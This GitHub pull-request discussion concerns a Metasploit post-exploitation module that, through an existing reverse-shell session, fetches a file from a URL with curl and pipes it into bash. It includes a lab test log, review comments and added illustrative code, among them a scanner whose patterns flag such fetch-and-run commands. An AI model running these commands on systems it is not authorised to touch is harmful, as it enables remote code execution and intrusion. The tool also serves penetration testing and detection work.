Post linux manage download exec #1596

Merged
merged 1 commit into from Mar 20, 2013

2 participants

@jabra-

Linux post module to download and run a file

@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 14, 2013
lib/msf/core/post/common.rb
@@ -80,6 +80,10 @@ def cmd_exec(cmd, args=nil, time_out=15)
return o
end
+ def vcmd_exec(cmd, args=nil, time_out=15)
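Review bot: `vcmd_exec` lands in the shared Common mixin with no doc comment, and its name alone does not tell a reader how it differs from `cmd_exec` (same signature, but with printing). If it stays here, add a comment above the `def` stating what it logs and when; otherwise keep the helper local to the module.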
@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

I must admit I don't see a real benefit in defining this method in the mixin. And I don't like the idea of combining presentation helpers with logic in the same mixin. Maybe it would be a good idea to add this helper to your modules atm.

But yeah! It's just my opinion :) So I'm going to ask someone else to share their opinion on this point!

@jabra-
jabra- added a line comment Mar 14, 2013
@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 14, 2013
modules/post/linux/manage/download_exec.rb
+require 'msf/core/post/file'
+require 'msf/core/post/linux/system'
+require 'msf/core/post/linux/priv'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Post::Linux::System
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Linux Download Exec',
+ 'Description' => %q{
+ This module downloads and runs a file with bash.
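Review bot: `msf/core/post/linux/priv` is required but `Msf::Post::Linux::Priv` is never included (only Common, File and Linux::System are); drop the unused require or include the mixin if the module actually needs it. The two consecutive blank `+` lines after the includes are also a style nit.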
@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

I would love to see it reflected in the description that "curl" and "bash" are needed on the target system. What do you think?

@jabra-
jabra- added a line comment Mar 14, 2013

I suppose I could add a check to do which curl and which bash. Not a problem.

@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 14, 2013
modules/post/linux/manage/download_exec.rb
+ include Msf::Post::Linux::System
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Linux Download Exec',
+ 'Description' => %q{
+ This module downloads and runs a file with bash.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Joshua D. Abraham <jabra[at]praetorian.com>',
+ ],
+ 'Platform' => [ 'linux' ],
+ 'SessionTypes' => [ 'shell' ]
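Review bot: the Description still only says the module "downloads and runs a file with bash", while the command it runs depends on both curl and bash being on the target's PATH; state that requirement in the Description. `SessionTypes` is limited to 'shell'; if the cmd_exec-based approach also works over a Linux meterpreter session, list 'meterpreter' there too once tested.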
@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

Since it's using cmd_exec, maybe it's also compatible with a meterpreter session. Did you test?

@jabra-
jabra- added a line comment Mar 14, 2013

I didn't try it on Windows, since I was focused on Linux at the time.

@jvazquez-r7
jvazquez-r7 added a line comment Mar 14, 2013

Yeah, meterpreter on Linux I mean.

@jabra-
jabra- added a line comment Mar 14, 2013
@jabra-

Added auto-detection of bash and curl from the PATH.

@jvazquez-r7

Hi @jasbro,

After discussing with @jlee-r7, we're going to ask you to avoid merging vcmd_exec into the Common Post mixin, because that way it would be merging a presentation helper into a "logic" mixin.

On the other hand, as pointed out by @jlee-r7, it doesn't seem the best idea to vprint_status the command before running it. As he also pointed out, when there are commands without output, vprint'ing empty outputs can annoy the user.

I guess it would be a good idea to include the helper in your modules atm, following the recommendations above. Surely it would help to accelerate the review :)

Thanks very much in advance! And if you have any questions, don't hesitate to ask!
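An added illustration (not code from this PR or from Metasploit) of the helper shape the review asks for: kept module-local rather than in the Common mixin, reporting the command only once it has run, and skipping empty output. The `runner` and `log` callables are stand-ins, assumed here, for the module's cmd_exec and vprint_status so the code runs outside the framework.

```ruby
# Added example, not code from the PR. `runner` stands in for
# Msf::Post::Common#cmd_exec (takes a command string, returns its output)
# and `log` for vprint_status, so this runs as plain Ruby.
module DownloadExecHelper
  # Locate each required binary on the target's PATH via `which`.
  # Returns a Hash of name => absolute path, or nil as soon as one is
  # missing, so the caller can print an error instead of exiting silently.
  def self.locate_binaries(names, runner)
    found = {}
    names.each do |name|
      path = runner.call("which #{name}").to_s.strip
      # `which` prints nothing, or a "no X in (...)" message, when absent
      return nil if path.empty? || !path.start_with?('/')
      found[name] = path
    end
    found
  end

  # Run a command and report it after it has executed; only log the
  # output when there is some, so verbose mode is not spammed with
  # empty results from commands that print nothing.
  def self.run_reporting(cmd, runner, log)
    output = runner.call(cmd).to_s
    log.call("Executed: #{cmd}")
    log.call(output) unless output.strip.empty?
    output
  end
end
```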

@jvazquez-r7

Working as expected with shell sessions:

msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
msf exploit(handler) > [*] Sending stage (36 bytes) to 192.168.1.159
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.159:48138) at 2013-03-20 16:44:49 +0100

msf exploit(handler) > use post/linux/manage/download_exec
msf post(download_exec) > show options

Module options (post/linux/manage/download_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
   URL                       yes       Full URL of file to download.

msf post(download_exec) > set SESSION 1
SESSION => 1
msf post(download_exec) > set url http://localhost/test.sh
url => http://localhost/test.sh
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > set verbose true
verbose => true
msf post(download_exec) > run

[*] Executing: `which curl` http://localhost/test.sh 2>/dev/null | `which bash` 
[*] Post module execution completed
msf post(download_exec) > sessions -i 1
[*] Starting interaction with 1...

1730827770
lrMxozAifMwvqjccHHmsjOvzwrVuAQGd
aDiCHMssYpPGXcFChzjDdguTqNyAJKZw
UnAonWqkQUxQSdcCPKfhzynIczTNroXD
cat /var/www/test.sh
#!/bin/bash

touch /tmp/pwned.txt
echo "hola" > /tmp/pwned.txt
cat /tmp/pwned.txt
hola
^C
Abort session 1? [y/N]  y

[*] 192.168.1.159 - Command shell session 1 closed.  Reason: User exit
msf post(download_exec) > 

But I've noticed that when curl isn't available on the $PATH it just exits silently. Because of this I've tried to solve it with https://github.com/jasbro/metasploit-framework/pull/2, which tries to check if curl is in the path before proceeding. I think it is valuable, but please, feel free to review, and if you agree with the changes just land it, and this PR will be updated automatically :)
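The execution line shown in the transcript above, seen from the defender's side, as an added example that is not part of this PR: a small scanner that flags command lines fetching a URL and piping it straight into a shell, including the backtick `which curl` ... | `which bash` form this module emits. The log lines and their field names are constructed for the example, not real records.

```ruby
# Added example, not PR code: flag "fetch a URL and pipe it into a shell"
# command lines in process-execution logs. The log format is assumed.
require 'uri'

# Fetch stage: curl/wget (plain or the `which curl` backtick form) followed
# by an http(s) URL, up to the next pipe or command separator.
FETCHER = /(?:`which\s+(?:curl|wget)`|\b(?:curl|wget)\b)[^|;&]*?(?<url>https?:\/\/\S+)[^|;&]*/i
# Shell stage: a pipe into bash/sh/dash/zsh, by bare name, full path,
# or the `which bash` backtick form.
SHELL = /\|\s*(?:`which\s+(?:bash|sh|dash|zsh)`|(?:\/[\w\/.-]*\/)?(?:bash|sh|dash|zsh)\b)/i

# Return the fetched URL when the command pipes it into a shell, else nil.
def pipe_to_shell?(cmdline)
  m = FETCHER.match(cmdline)
  return nil unless m
  rest = cmdline[m.end(0)..]          # everything after the fetch stage
  SHELL.match?(rest) ? m[:url] : nil
end

# Constructed sample log (one process execution per line), not real data.
SAMPLE_LOG = <<~LOG
  2013-03-20T16:45:01 host=web01 pid=1201 user=www-data cmd="`which curl` http://localhost/test.sh 2>/dev/null | `which bash`"
  2013-03-20T16:45:07 host=web01 pid=1202 user=www-data cmd="curl -s http://203.0.113.5/x.sh | bash"
  2013-03-20T16:45:09 host=web01 pid=1203 user=root cmd="curl -o /tmp/upd.sh http://203.0.113.5/x.sh"
  2013-03-20T16:45:12 host=web01 pid=1204 user=root cmd="wget -qO- https://example.net/i.sh | sh"
LOG

# Scan the log and return one hit per flagged line with pid, URL and host.
def scan_log(text)
  text.each_line.filter_map do |line|
    pid = line[/pid=(\d+)/, 1]
    cmd = line[/cmd="(.*)"/, 1] or next
    url = pipe_to_shell?(cmd) or next
    host = begin
      URI.parse(url).host
    rescue URI::InvalidURIError
      nil
    end
    { pid: pid, url: url, host: host }
  end
end
```

The download-to-file line (pid 1203) is deliberately not flagged; only the direct pipe into a shell is.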

@jvazquez-r7

Thanks for landing it, merging!

@jvazquez-r7 jvazquez-r7 merged commit aa22a82 into rapid7:master Mar 20, 2013
